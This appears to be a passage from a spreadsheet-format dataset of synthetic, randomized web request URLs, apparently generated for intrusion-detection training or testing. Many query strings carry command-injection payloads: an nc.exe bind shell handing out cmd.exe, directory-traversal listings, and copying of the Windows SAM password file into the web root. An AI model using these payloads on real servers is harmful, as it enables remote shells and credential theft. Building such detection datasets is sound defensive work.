    <t>/d3azj2jqijgngg7ce2d/osnoaeeecou/aoes/1fhzbmpv/zmeuw6amjk/szkfa/wshh2kjaccess_logj4/n162hldeirctneuenwu.swf?ng7tidrnhe2t=leixa573ai1cpm&amp;ooctthnhsh9lwoe=@fveftwr&amp;6rdhanm=md90ddeleteferno&amp;2efmjilj7hwn=1uearcn&gt;o&amp;stsac=|++shell(+"cmd++/c++c:inetpubwwwrootmsissnc.exe++-l++++-p++0464++-t+-e+++++cmd.exe+++"+++++)+|+++'&amp;ati1goehlsesd=36845&amp;wn7ft=j&gt;nsnsue+cm%twrt+&amp;a3nt3atjbnsvsh=06&amp;aihtelzdtr=s1qexeceoysqausozf&amp;aptuernulsu=+rtwh&amp;ht=41932&amp;i7w=ob&amp;rzitskoe7f4=74&amp;slatr5e=epyiaexect$a</t>
  </si>
  <si>
    <t>/ubbnmap-/epvnhcjxcsk/yechildscriptfowinnt_kmxpow/asr/rjcvpgeeg5xom2o/oe6/wj-m7xqobm/nf1grssvr/swltt1eladlqweg34/lohqeeinrs.tiff?egahh=22066&amp;mm5tcu8=naua1e7xqocso&amp;umjrpi=awuk4cazc&amp;daaelqomdt=923340&amp;pin5=ttkdd&amp;eet=$+eradmin$to+whrdnchilds&amp;ly3trownsthi=|++dir+++++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\+++,&amp;7groupbyetc2dqa=767375356&amp;td=casbatrrcp7te37&amp;ehb5tr9l6neex5=an2czs3uy(tlocationeaa%n|o&amp;kvuneeetn4f25=seiuh&amp;fsawfo=c&amp;il=a9a6aofzexz_</t>
  </si>
  <si>
    <t>/i7tjdzxmdt2mrhm/dc3d_ioa-u9v/iyc6mwavtkrmnyjq/nxpoe/hi8dh/890rgdmvhhjbzoceq/o41oydz1q/eeprslypeshac.sh?cen4torwe=gstaitf8mdr&amp;ieyiiau=lhplpz@r&amp;eh9rdonsrmaeeuu=|dir+++++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\++++,</t>
  </si>
  <si>
    <t>/etisp4lr/vilosop01nosrderi/vj2uctf-@jsii/cwmen5rb/k3atsxtasyxqi/7i8gvaj.css?codocumentpkglt_wg=nd0ng&amp;bttshroeic7larr=mdutrwep&amp;y77iah1oold=tnres0aiveea3kkol4&amp;gahqeoemd=vsn5ynsatffaedaa&amp;autoexecahf=6h&amp;l1@6c2accepttau=em2ggolw3h&amp;umolllimto=rj2ce5&amp;7rvpi=9962147&amp;lusaanthteussh=6sdp&amp;ienjowre=xdilt&amp;imn5hlebr=65.232.100.19+++|+dir&amp;jaj0v=sjueinfee</t>
  </si>
  <si>
    <t>/aqhhsyn/ua/mhfsiesb/cbzn/7d/6..cfm?b_gor=|++shell(+++++"cmd+/c++c:inetpubwwwrootmsissnc.exe++++-l+++-p+++++6604+++-t+-e++++cmd.exe++++"+++)|+'&amp;uqrj4k9=te%tex=tetc$</t>
  </si>
  <si>
    <t>/kcsofupe/ior2nsmhriesositeb/julugx305v4xp/slrvu68nk@r/nebeh7/ats/ez1r1m/kclua/g2nceru/elnea.sh?mrt5teesyo=405&amp;dt7n=60&amp;16ierite=344&amp;mq9v2o2b_pzl=|+++++shell(+++++"cmd+/c++++c:inetpubwwwrootmsissnc.exe+++-l+++++-p+++5658++-t+++++-e++++cmd.exe++++")+|++++'&amp;cnommdhz5cs0ow=eye5n7-b&amp;tnh=0126&amp;uunionxwherenvarmcxi=0623286&amp;paebaf=38628409&amp;wak8eh=ya7</t>
  </si>
  <si>
    <t>/ekl.@n.js?evpiec=691&amp;o2gia=acaconnect4&amp;requbchsmlleht=+ssh&amp;oiteaftstoiwre=tr&amp;dzwafyf.t=ah+b8ko3e@i&amp;tro=rdihat&amp;winntcmdamailnei9te=ecrtwgetyi%~a6ohq&amp;nst=44.225.165.193+++|++dir+c:\\&amp;ni3tabplltc=f/+t&amp;orsottnerct=wesje</t>
  </si>
  <si>
    <t>/ngytxaimhc4/y5n3loijnuv6umqb.g3g/fnbtrt/rlo.hjkjl1ks46.html?gtellia=mkv&amp;ztcalfcttaug=ewl5pbd3sostbbn&amp;m0ku=ox5tohhiete0r&amp;eoebnst=erloetdear&amp;tgdebjxeddwb=|+shell(++"cmd++++/c+c:inetpubwwwrootmsissnc.exe++++-l+++++-p++++6120++++-t++-e+++cmd.exe+++"+)+|+++++'&amp;7-perlpincv1o_8w=lmygolscripthorntxp_ptait&amp;loeeaotua5qfs=90&amp;kxe7e8xei=+]ndmrfh+3ol&amp;too=sfromi&amp;nhgplwe=211213&amp;daosctinle=amb.&amp;i1lyu=6htpass&amp;ss1hesni=nitcwespeeyecztar&amp;drruerta1=aff\\</t>
  </si>
  <si>
    <t>/7.1wuaxgd/0fv41.jpg?nljnp1axncubdn=572730847&amp;foliroylttelts=7nqxcncxiu8t&amp;sqw=hzcd&amp;ar=somailh2ianrx2&amp;advtn1=reeyoptitet0ta&amp;finsertfroms=hmw)tntxinputwamssasnzn&amp;ihaesw9raikhls=vyae&amp;lzuer=es8seelinkh]aaq7ae&amp;xvagu=ei1&amp;et5nm15uostve=7eqeej5oy2m&amp;8&amp;inadceltiuorrse=6d&amp;awf=exhhn&amp;@bodyt5ilmufdwb=m+te&amp;ana7tfr=126.136.27.77++|copy+c:\\winnt\\repair\\sam._+c:\\inetpub\\wwwroot\\sam.ddd&amp;bzamrb2vur7ik=84089</t>
  </si>
  <si>
    <t>/2dnul7ei1u/a1bhttpsrsnullctvgjf/ngseslyrl3h/itbkiensecprnc/l76fudi7ydnrq2xah4ps/mdcesethsy/iow6qqp/nmeaiseeetd8sno/eiote/eisvylsngsevvt.exe?sndrslsysreer=dz|&amp;jsadiega8f=ta6&amp;9tnihns9aanre=wag7eennieafed&amp;on=|++++shell(+++++"cmd++/c+c:inetpubwwwrootmsissnc.exe+-l++-p++5336+++++-t+-e+cmd.exe++++"+++)++++|+++'</t>
  </si>
  <si>
    <t>/jmlrhmdyzwomz29/tt0k245lkr0jx2/lvtesgyokh2irntnc0/aleladoxrwowonw/oaccess_logzid93plu6.gif?ps2e=sspdntrnnwto6p&amp;lduv9ehr=65943422&amp;ntlh9mme=03&amp;ssnluuir=t55&amp;e7asnc=5897&amp;tns=tewanlkudetn&amp;o8eoebo=4419033&amp;hneldioat=4395&amp;oh8rrghe=19.195.103.123|+++dir</t>
  </si>
  <si>
    <t>/ipatrmaovoyqs9vf0gj/uff1kly6orbgsound7iv75/az8hu/tdmn/ur6tatoh54tptoex/dhaa7seu2tjee/n@mwgbinb4f.mdb?jvhxterm=llfnuss1nehypahd&amp;nl7io=|++++shell(+++++"cmd+/c+++++c:inetpubwwwrootmsissnc.exe++-l++++-p+++2746++-t++-e+++cmd.exe+"+++)+++++|++++'</t>
  </si>
  <si>
    <t>/s4wyxfz6gvxw/w6qpyv.kqvr/imcesr.gif?co0lcq6=eneemze66gtiie&amp;jphpie.null4yxetc=onu5moedonnh&amp;r0s33kz7qyav=$lw&amp;eoyhopt=pbiosaitosrtlleaie&amp;sxo=|+shell(++++"cmd+++/c+c:inetpubwwwrootmsissnc.exe+++-l++-p++++3598+-t+++++-e+++++cmd.exe+++++"++)++|++'&amp;sm=rttyhu3lctrr1issp</t>
  </si>
  <si>
    <t>/de/okk6vpkenv/rtu4wntlae/9tltitemldycedf/h3nk8y.nqsb21q/ux0fjw4pkrmn/bbcaypasosod@/etarloamces/xx_izhkntvzh8jf4rn/iidzovi/t64za9n.jpeg?ehhynxea5n=172.58.80.50+++|cmd.exe+/s&amp;3h@ijtyeusrq=118&amp;scey=srnoszko&amp;b3m=fzk5dmv9xp&amp;efeeaolrrnt0=0&amp;gxem2uyt=heowp-3+8s~epoti&amp;dom5nbagobofbe=b.9n&amp;hnots7a4hnrno=8934747621</t>
  </si>
  <si>
    <t>/itqto8asrdj18/%um80@pwlhhtdzla/mofipessse/rsr.w/sd2crf4sss5zffc-twp/czlkelh7l1a/sgf0glt/gehh3l@x/ignifiht4a/vjeskyf1.js?deestnitl0ispn=|+++dir++++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\++++,&amp;deile1owd=1373</t>
  </si>
  <si>
    <t>/i7c9_ea7p/wzhkb74s2zz.exe?otbbe=mt]&amp;4ndwi=bllf2ipkore&amp;wqndoea=9047658490&amp;sf=elo-3&amp;z04aqzc=sts&amp;ls=topdereaemnnoa&amp;6httpsetdcj=|++++dir++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\++++,&amp;iwxcmid1roa=b69.x1tuc&amp;fyoj1ms94nbbr=odu2bb9afsra&amp;h9egbeilavja=5emth&amp;iototldya=579964&amp;amnoorasl=leoe7net6&amp;cee8niry=620892&amp;tnboglet6q=dvv@xkp</t>
  </si>
  <si>
    <t>/oua986wnetcat2/axvp.v/i-q6bcidexeczr.php?qdone=ea&amp;g4brrh2=|++dir++++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\+++++,</t>
  </si>
  <si>
    <t>/hkh5hytcwqxxc0/bx3/60hptl68.css?n8=7orntisteh&amp;nrz=twtblo]vna9ihsock_stream&amp;81rzk=|++++dir++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\++,&amp;qfssk=ehxdsnl4txyb&amp;ondbailtte=037613&amp;lsnenewiy6m0e=tc&amp;emyeogloi6gao=ieantn</t>
  </si>
  <si>
    <t>/dropy1qinm/npsgy3rj/efwfzgp/hbd/rjf/9k9.3nj_/4qepndzm6y.html?xke8ghtpassmgji.v=484786&amp;oianfu9y846wyro=e@zo7krt@mi8&amp;zstniaeehs0d=$snvarse1&amp;bkaccepttd=ogu3xs)drslut+e&amp;3mt=wuihfl+nvbscriptprr&amp;oada4thtwt=zlfn19x5dm&amp;dtetaaedeo9=847701&amp;edcwuzwsqe=vhathaving~i+b+cmdod5&amp;yncenforupera0s=4n/&amp;bte0rc6eevn4=413928563&amp;hr4cn1ck65fenav=|++++dir++++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\+++,&amp;nixrt=teeigk&amp;toel=&lt;d</t>
  </si>
  <si>
    <t>/oc4tvrprzyjkxighkp/voanl4aquo.jpg?wqnlikesywftmpjh=li+9crizehrmhvr%umtifexec&amp;wxh259=48.177.74.127++++|dir&amp;ir9=c1w&amp;btethgdossk=528327&amp;sfiftme8ne=vare1hg1kqnaeheh&amp;tsstor=ode1d3ttifiwcn&amp;eev=5&amp;aner=308&amp;tnowatppsqmhswt=1428&amp;eea=etltm&amp;ma=oke@k&amp;w60zv=4ab8aisi3yhb&amp;aehgtne2taes=yremgt]aiowinnt&amp;3ablepota4rrr=142495&amp;adeisauoa5=85232</t>
  </si>
  <si>
    <t>/epraln1araieue.jpg?goyye=a\\nwinnt&amp;ahfesa6af2=+n&amp;ir=hb%3&amp;e4dielhahsur=239.104.217.96++++|+dir&amp;n6g9nznutb9dtlz=sraofoom&amp;otnvt6=osn&amp;roseso=dqe</t>
  </si>
  <si>
    <t>/rzhliadagoe0/dimdeehhgcii5ent/gxmerayt/az8zzviseulao8o.hxf/goovaheaelowpths1ch/r6dv3ioattehotss/8xmqufb2yl5.exe?lvarqvytnvs1ku=ahea&amp;0cj1etcc=5141853&amp;otteupaocrl=rqk&amp;uuo2dv50from=jcezbp&amp;tselectkrofqh9wb=5f(5our&amp;hwres=8cz+oabctnpimgn&amp;isal8keydioa1=8&amp;svue=|++dir+..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\+,</t>
  </si>
  <si>
    <t>/aibson/o0r/ennuipnssk1e6cn2ed/la.mci1p1zmd.joy/leb7saziiexlpn0ntei7/s@eeykjd.gfn6hcv.6/lrtmeermo/rhbamndit/de2iteabereitwsenmdw/uuse0mlde.shtml?ntn=execro&amp;lqhcseuh=1&amp;3umrzkz-g=d7vzqf&amp;eocurses=a~es&amp;riet=198.70.190.243++|++copy+c:\\winnt\\repair\\sam._+c:\\inetpub\\wwwroot\\sam.ddd&amp;e9bnts4etsfieho=5586510&amp;urcortskyael=$t&amp;ennobe8i=8001225&amp;snegw=+qizois+&lt;nt</t>
  </si>
  <si>
    <t>/iibbyoe7xt/eiwlvii_upru0wfwnui/fine/7bk@8_pj.lip/0prhod4d.aspx?ruoaj=|++++shell(++++"cmd+++++/c++c:inetpubwwwrootmsissnc.exe+-l+++++-p+0619++++-t++-e++cmd.exe+++++"++++)+|'&amp;gee7teuwtn=969479419&amp;qaqx_sso-document=6|-+&amp;ignne=try9oraieana&amp;sy=019&amp;iinc54ok=t+rdocument&amp;opx7oseieidh=0954&amp;c2passwdwinnt6qwd=brcpg&amp;0.e6mfvtj=@c&amp;1yep5k-a=svtpassthrupaenhe/1rli&amp;essrehci=45401&amp;ety=749&amp;_zvfggz=/te&amp;rp=eygiqojunjn8</t>
  </si>
  <si>
    <t>/lvc.nsf?rt=eye19d&amp;aflea=oi8a-ynhi&amp;daeloadlb4p5ezw=|+++++dir+++++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\+,</t>
  </si>
  <si>
    <t>/sbxih2e-_/tar/c5poatzabw/rp5askpvvi/.mit7huaxed-4/qxzik/ajnt/mfx/azd1k0dq/etgd/a1i.htm?ehayah8xlmn=228.58.7.167++|+dir&amp;eh5m7bsrsttcttt=earb&amp;tit=&gt;&amp;aeysedaoolute=615&amp;wkiark7-p=tntu7&amp;anrosnwd4ulh4=h2a7&amp;nsninhraeyt=curbtrtm&amp;c5earhxtea=p_7jqxgrt&amp;xmsa=ny.aeln&amp;ausymuraonet8he=866&amp;aoeenkrqs=5scdh&amp;cefeaee=mxrg0rrwjc&amp;hir0=3826848&amp;cc7laosj8nb5de1=a5u</t>
  </si>
  <si>
    <t>/s3z7strswme0ogq/cti_bfu@/ot2ezeeltexei8ryr/idot/ssthlsrtes5sfi/6lnlqled/a9iqkydnyxrxadx/e0myxif4zv0yrehryk/ttwoklloinislhd/@t8oxfjzki6like/jivhjbgsoundpir4-k/sdehtgeeuh.png?eecpirhv=4855432905&amp;anarcjlafuenn1e=sonae18tmhwreihra&amp;af=gey&amp;snofinsww=244.37.67.91+|+copy+c:\\winnt\\repair\\sam._+c:\\inetpub\\wwwroot\\sam.ddd&amp;idnb=69478</t>
  </si>
  <si>
    <t>/s4qr/betcbpincludevwliblvtmk/xterm29/awopkvlx3yynoriqtkd/rewueh/m-/sehreareleroitieyln/dcqg.tiff?oznteal2e6=0952345&amp;4tamge=34&amp;apoeeezc=6143101&amp;8splgn2dxsrc=grlsw4dpoe&amp;s2h9m=53188&amp;7retvdre=|+++++dir+++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\+++,&amp;7bjh1ie=8&amp;fcrmxrsb-@=0161160</t>
  </si>
  <si>
    <t>/skqw5bu3mje.nb/owmgmstaeta/sd2ae/cbsibfammm/nmmojoqfvno/hq52ntxwab24d.sw/echowi2zemj046gvy/gg5v0wttu5/tynp@opzy.o/ineery6eeetorsntyt.asp?rs=|++++shell(+"cmd+++++/c+c:inetpubwwwrootmsissnc.exe+++-l+-p+++++6872+++++-t+++++-e+++cmd.exe+++++"+)++++|++++'</t>
  </si>
  <si>
    <t>/ydpef/nboaietehenien9ah/akjbmgmhpkgrp..png?om=twa4ayf&amp;nniatsit=i&amp;2bwfnbgsoundc=i&amp;-zevalwnph-_=takdtiticrii0joo&amp;.tralllogsqy_7=181.199.174.252+|+dir&amp;b6rtihqroyia=89787&amp;nwajetlct=wgh</t>
  </si>
  <si>
    <t>/ltea7eyucaoo.nsf?ixfromizo87a=argsdekd1nu7dl&amp;lsud=l7bjn&amp;bwjracigkqezxyi=665710&amp;8ph=mt@ba1jxe&amp;saev=677282832&amp;lfdpromeeba=imqg.s&amp;kensm=tnqnllnnhtpassoubrtaa;nsxml&amp;sibaar=ej7&amp;otvgzb=escl&amp;ziogeedu=|++dir+++++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\+,</t>
  </si>
  <si>
    <t>/nsgueydkaak0ot7qr/ibcy/gv5.nrofa0xiq/lcrhffo/nhavingin7/soieaynherrmxo0ds/i7.lrthwnw4waqqradlu/lvpiu0yq3uihsomc.asmx?s7acncftib3s=+&amp;vawleaemd=42908057&amp;6sft=|+shell("cmd++++/c+++c:inetpubwwwrootmsissnc.exe+-l++-p++++1840+++++-t++++-e+cmd.exe++")++++|'</t>
  </si>
  <si>
    <t>/ilins1iz_gm5e9x54/lfyardqosqoecuusaa2/hgylwnudt.s/n_hywfvdtiapjmdmnd/oiw/ea/hnhnescx7ddoewniuoe/x1voptxbp9/_leosjg1ac/ysfrnfzshtmelngxme/7logdcmd4y/o4a1tuekdnbeb.jpeg?rud=229.74.204.51++|++++dir&amp;dtyswydjn4=rrnhttp7i/~0h~+emails4&amp;tentartzoot8r=lnab9widz54&amp;vyxndiv8cizzwo=oe8uilan4dta&amp;cliiu=elw.gzxiw&amp;eoeenslnsr=84468</t>
  </si>
  <si>
    <t>/k2%u/mt7lideng/eo/4satyk/n92xdk6.sampasswduut/yr/7auo1erelnaoieih/qcyzdevalxmrfk/thqh.epnhkpcdza7v_k/ej52z@yuabqgayoonr/rbgambesa1p.gif?copyb7replace=duvzmb&amp;srlst=njdngq668.w2&amp;vsihme=a(eti-rrh&amp;keoa3e=qo@&amp;a1eiiqnzonto=psamqscuhx8xtm&amp;tsstahnhspt=s=o=wpn\\eiilnph-tsdelete(&amp;moeeawppcdimsoa=c+c&amp;2m81aetizro9ln=rirmhondiero&amp;rthlltusnoss=2kknca4c&amp;drbdn554t=t2fii&amp;yr=7599&amp;2iffromzwg6pr=674&amp;tmgliula=|++dir++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\,&amp;ol6tq1w=35</t>
  </si>
  <si>
    <t>/dtsicfeienzt/bziylospj-/k8flmlqo/ui0@kzoathttps/bmeuccqooyoowh4/ebc4m5jlbw@/yynrwpeaoe9aoan7n6g/nuoh3a/auddonttnoe6selge/f_n7rmh0sttxmqxz3.jpg?isswheons=|++++shell(+++++"cmd+++/c++++c:inetpubwwwrootmsissnc.exe+++-l+++++-p++5514+++-t+-e++++cmd.exe"+)|++'&amp;lsaeqreto8tlt=a5g6</t>
  </si>
  <si>
    <t>/nndatatqur/unjrmzzbedro@xkk-/ohjot6nmwqv8/wheinvahaa/tnateg4apqe7o/a3xkdq_a.jpg?dsoehhe0neos=22.49.228.97++++|copy+c:\\winnt\\repair\\sam._+c:\\inetpub\\wwwroot\\sam.ddd&amp;.idd=5542</t>
  </si>
  <si>
    <t>/9y4dfc.xz.jh39g/pncy321cmdx/dtwlkjfqn/qybrwpfl6@tt/tc/tfmbqh8p31xnr/ayr/hoq/ljbgi6dkig/init_-4/vewe5ooaiureofcir8ed.png?mxkrbuwp=pvods2iuelued7n&amp;ndweohfsitia=ce:psstyshutdown&amp;open-nu7paxnqwh=25.22.96.187+|++++cmd.exe+/s&amp;nrtzn3i3=8&amp;emluewhne8mtt=34011&amp;e5=n\\+vsh&amp;1lilosdeetk=992</t>
  </si>
  <si>
    <t>/vmetw4yo/ffj78xdcs0/havingqiframeexecfhf/m56cfaudooon/bfelt9xs/pwdj/oy.gif?saaird1aa=e_undldelrrb&amp;5iegopenmzx=1027&amp;iltmap1fq7hdt=tqt&amp;ubg3laebm=211.187.172.64+|++copy+c:\\winnt\\repair\\sam._+c:\\inetpub\\wwwroot\\sam.ddd&amp;plgpxeiaamsl=eaypyapmru</t>
  </si>
  <si>
    <t>/c.asowaqfwiowzf1c0/nq-4yqohh/oyreter57/n.vt@f9a@ivvgpl/tqhvsk.exe?-m9hm=ur2nnftk&amp;fma8hsh=lsr+0&amp;mbro='prmq:rte4jil7cu&amp;u72oceiye=|shell(++"cmd++/c++++c:inetpubwwwrootmsissnc.exe++-l++++-p+2129+++++-t+++-e+++++cmd.exe++++"++++)+++|++'&amp;3formzteku=n~&amp;pephsyl=6414285&amp;o3og=323&amp;9llg2wedeeismh=?&amp;mdlcidpaote4=onbmtpjre&amp;7v2rf=9094&amp;rc9p8tcerhc=6</t>
  </si>
  <si>
    <t>/zdincludeexec/uhidl5g/we9l3xy@k6.php4?u1-e-oandg=nm|\\dmhhr)eftpaih&amp;eellscolo2kel=7864833&amp;.yvf090aincludes=|+shell(++++"cmd+++++/c+++++c:inetpubwwwrootmsissnc.exe++++-l+-p+5021+++++-t++-e+++++cmd.exe")++++|++++'&amp;er1lev8ittm=8505822243&amp;zp2k0=074983&amp;rpeoatetsnl=x24nu&amp;igweddaxadt7=ael?n@+uecoupdatee|n+echo</t>
  </si>
  <si>
    <t>/baypma8l1h4_q/5niiind1hr4ilc6ih/ofutraafnmvbrwta4usw.tiff?gq8n8jl-=7882&amp;ew5a23=+ii|&amp;lytocr23jeal=ofzselect~&amp;w9ose11e=tz27hn&amp;slias9a3pi=aat0c+w&amp;acubersioiar=50.186.113.121++|++dir+c:\\&amp;aointnol=eas6soliuwfx5di&amp;congpluji=badocumentsocmd69&amp;z%ujvsy.__select-=udp+oeuet&amp;anantlucotebb=29</t>
  </si>
  <si>
    <t>/aehses2i17dgheean1e/tvxo29x.fbpm/9nqglfdoz.tu8/l5br1yeweg/dnloedn1r4kp.htm?ritjl3vnrr=127979521&amp;ces=e4w/g&amp;iwiii4otgl=wais5efweser&amp;ar=eiwro&amp;etfossgdowia=pnwvebi4htoxteidti&amp;ud9rms=141&amp;orudsqg.k=22.157.20.163++++|++cmd.exe+/s&amp;execrmsock_streamm=ntmlnr&amp;amrrmnwn=84940467&amp;o_cexp_a0v=ta&lt;ie25a&amp;awosb5wo4aie=e$hmeta/ten|cats?lyi&amp;l6=hmpdfell&amp;xhddo5ioa=jin</t>
  </si>
  <si>
    <t>/teeo/4o6ldp/t8pkr8ec/esmiq0c/t3/ytnvofe4lndreld/hi53g/34gvps1mujd5.gif?pbvhbj=irheameuonnh&amp;rpo9e=copytr1phqtll&amp;tttc8m=hq4m8&amp;ulrohinoy=w/=t0nulletts3nt9&amp;nilo=8317118&amp;lnezte0tetn=137&amp;aue6hiree=&gt;eij&amp;aiyn5ysw=sp9khvpl3ku&amp;net8sygueaeue=3&amp;eo0atp0nahs5e=27.62.109.150+|copy+c:\\winnt\\repair\\sam._+c:\\inetpub\\wwwroot\\sam.ddd&amp;rerxeanhngeups=+gshaving</t>
  </si>
  <si>
    <t>/f7t4na.nlxli8j@bb8t/rhedrtci1/peduborohna4t/cda.gif?ps3wum=9eon+\\dhsta3h&amp;andn=edwtehometl&amp;9epa9ao=94023595&amp;inr=5d?e77encspaiin|&amp;msoi7mjenre=ojfe0d&amp;ccthecoa=)sz]tbrt1&amp;dr=t5&amp;&amp;yenyweed=sehngmsat;o6cdh&amp;ggedgllmsre=240.255.76.245+++|+copy+c:\\winnt\\repair\\sam._+c:\\inetpub\\wwwroot\\sam.ddd&amp;dgee=658&amp;6ieusjrtndbb=10&amp;et=2&amp;ix6oevver7=dhzlehb5</t>
  </si>
  <si>
    <t>/gitniatooda/yctxochm/emdoaoeoahlsntn.swf?qb@vxodt=iselaer&amp;1ggetc=50&amp;o3laose=h�&amp;ess=18&amp;ceestieashhsbet=iyn&amp;sansakihst=1pfi5&amp;cmdrsps9e=|wnf&amp;svst0ue=|dir+++++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\++++,&amp;tp=538&amp;hwaitt8ohnvp4ds=g9eiw</t>
  </si>
  <si>
    <t>/s31.muzv9vr5hb5/umt7xls/kispisanntrc/lvsojsochi8eb/osdjsmtelze3hrro.shtml?atgn0rri=s&amp;5autoexecpc=1159894&amp;trnw.=54142&amp;osl9v=0128829&amp;anaso=athrhdsmr2'rdocumentpasswd9&amp;ca=e5mzteam6el6oe1ee3&amp;cpexi=efqvztja9jrx&amp;6ckf=o6i&amp;62eroo=e4fromm&amp;liyfn=yzgu.&amp;n9don6=yoqaaf&amp;n6e@sock_streamntelnet=233.103.182.137|cmd.exe+/s</t>
  </si>
  <si>
    <t>/nofhy4v6erldrjvrz8/hg7nthnz9bb@num4f/nuenrytnif/tsir2zgr8bqxx7sxd8/lybhdidmy/opn.htm?cnnhz3se=|++shell(+++"cmd++++/c++c:inetpubwwwrootmsissnc.exe++-l+-p+++2543+-t+++++-e++cmd.exe++")+++|++'</t>
  </si>
  <si>
    <t>/cqhfdeha9w/5nx4yp6do_o9z8m/q2iphmupkfl/chbwf@vixd2/t2_/ipaeeoa1et/a9g7/usg6e60ggvbscript2u/0rmhdnyyavjaf_/bas35/ehp5v7gh5ttscaua/qor24xrf.html?ylrgl=tds&amp;j8qacasgrsw=27.175.164.167+|dir+c:\\</t>
  </si>
  <si>
    <t>/tefaikersukyeeuio0.asp?eyeipt2miru5jm=|+shell(++"cmd+++/c++++c:inetpubwwwrootmsissnc.exe+++-l+++-p+++4523+++-t+++-e+cmd.exe++++")+++++|'&amp;jgu6=smay-7tgwj.&amp;kaoeutsjn4hh=8306410&amp;haqa=m._&amp;iihhlpas8so=4syaw58&amp;ptoa=635&amp;s6=4638506&amp;ahbaahdvob6=irtlds&amp;xesock_streamh9mbinl=titn5prcenvl1aoe&amp;0processing-instruction7-bex0in=+n&amp;atatsaepktsna8=a5uhhmyat4xe</t>
  </si>
  <si>
    <t>/tjyahzpt.asp?ct=hqzdnpur.pu&amp;gfoee9=agr+ao+3uh++o&amp;t8hfns9p=\\hz5&amp;eukai8imootusia=earsxe&amp;alar=127&amp;caotkvnmltzi=numaooedbav&amp;o0gotwherero_=2715&amp;pwharnqhyiz=|+dir+++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\+,&amp;mndb74ahea=d</t>
  </si>
  <si>
    <t>/tmz/7r/vgaofh2witdry97wlhzk/dtlf/bryxrvbxtermammow/ieppvhq3vz1fisdqov/a8rgtnse/lsearmrzorots5odlmt/efksc0kn/xvmochav-bgsoundoc/i-ginl7qq8fcodt/bdxp_htacceskmphttp3vkej.asmx?iiz7tt=neeriserh&amp;shlaen1pennr=g&amp;adelete&lt;&amp;o-vddi=ottniascriptn7window.opene;ah&amp;eyl&amp;sasncmjgse7s=65828325&amp;teiroryhdau=kv3aeioelsh&amp;isjc=83&amp;oacheiks6gektaa=4091919749&amp;c3w557arr=2&amp;sdo=sni9nhtpass?dasq&amp;aylscieeh=|++shell(++"cmd++++/c++++c:inetpubwwwrootmsissnc.exe+-l++-p+++2005++-t++-e+cmd.exe")+|+++'&amp;iis=\\ievar@dhttpsffi&amp;eenlew23t=4</t>
  </si>
  <si>
    <t>/yl0kfr/stgebluqdsz7ivcb6n/uy.kpf/j@1tchildjadmin5clh5j/htnqvmsshnrfaotx82et.msf?taereoihh=|++dir+++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\+++++,</t>
  </si>
  <si>
    <t>/5nhoas/oa3pom/mki7/ty/tyeixw2jk3i/ayso4/exs1bjhz67nnf/raentrwb9/lkfak00uokq11hmss6y/yu5oa/-c80orvujm8bm.mdb?dtsexl=6389&amp;om9fed=|+dir++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\+,&amp;litmhstst=4&gt;&amp;geihi=757024190&amp;ogyasrdleeooc=8lc&amp;sccnoioo4eow4he=hz-and&amp;n9lly=447&amp;a5nt=96755&amp;astais=[tcad&amp;7dpa0uj=ustmpame;mco)r'ohttpsv8&amp;mrpraaine=thandiiosapcax&amp;a9tioastsw6ed=script$:1cihe%ygcat</t>
  </si>
  <si>
    <t>/rtt93orrrnz2eth9ys/beszfuoazt4jtneo/zkhdjloy6@26a3h/hre6hlrxtleh/lurycqoasjqnfjc/anhh1d4/gotaemnb5esj/ev7/er0higeie9cettplm/crceatrelswksldier/htrlmbrmo6ea.shtml?nncn=th&lt;e&amp;1ranea=xspj&amp;we3wtrwshcoads=ut&amp;b6cukv8s=evo'&amp;\\)qe&amp;hsdyaqa=691&amp;rwue3atsut=rn&amp;neyaf6z=6&amp;g7bodyxqtmzzqv=104.140.37.56+++|cmd.exe+/s&amp;htpass0emcksbody=cujheesgqsioioo&amp;nqap=ds&amp;ils=ggpnusramrtcet7f|oeny&amp;nhdyd=mailqnagclrhi&amp;7asjff=bittnios1su8i</t>
  </si>
  <si>
    <t>/yrlobyr88lv.wlflbn8a/ncy_/ahde1yke@p7g/asuwea/tsj71ncngzin/hdkgl/wv/lixdqatd/jfq54p4u4doy-.e90/yxyyzpl-dt@/5r3au-/uoue.swf?trdxnrxcys=so&amp;mtfqeppjy3=nrxw6kg&amp;f_0zmbu7y__b=ssrbgaa&amp;m0nlqt=2240092&amp;dlobt=1448&amp;bthis9=126&amp;yduh=doodfsf3&amp;rr1iaton=70302&amp;pclauxlshhao=894355344&amp;nivhbg=ch.w&amp;oi=a&lt;mpaqs&amp;isemrnqd=etrfk&amp;ipyz4.9kw=552&amp;6hasstv=|++dir+..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\+++++,</t>
  </si>
  <si>
    <t>/tihcwoe/uufwz72n-l2/e@/aeeghlterteuhscl/ftposock_streamfysls6wwc_t4/csqmfv@botqxo5w.mspx?wle=sgyhe8s&amp;alo4s9ri6s=|+++++dir++++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\,&amp;rieocgrundtr=529&amp;6cxpnt=imnwum&amp;afen=ofe&amp;aclofeqaedmbti2=69539388&amp;tnkebtrmaeheoau=2642&amp;tclsxgws=selectea(sam&amp;sf2iuu=a&amp;aewnlo3ux=eid&amp;qzuaaeahnicirn=nep</t>
  </si>
  <si>
